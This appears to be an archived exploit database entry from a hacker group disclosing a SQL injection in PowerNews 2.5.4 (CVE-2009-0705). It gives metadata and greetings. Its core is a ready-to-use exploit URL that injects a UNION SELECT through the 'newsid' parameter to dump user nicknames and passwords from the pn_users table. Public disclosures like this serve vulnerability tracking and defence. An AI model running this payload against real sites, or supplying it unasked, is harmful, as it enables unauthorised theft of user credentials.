PowerNews 2.5.4 - 'newsid' SQL Injection
Author: Virangar Security
type: webapps
platform: php
port:
date_added: 2008-12-31
date_updated: 2016-11-14
verified: 1
codes: OSVDB-51110;CVE-2009-0705
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.compowernews254.zip
#######################################################################################
# #
# ...:::::powernews 2.5.4 SQL Injection Vulnerability::::.... #
#######################################################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
exploit:
http://site.com/news.php?newsid='/**/union/**/select/**/1,2,3,4,concat(nickname,0x3e,password),6,7,8,9/**/from/**/pn_users/*
----
young iranian h4ck3rz
# milw0rm.com [2009-01-01]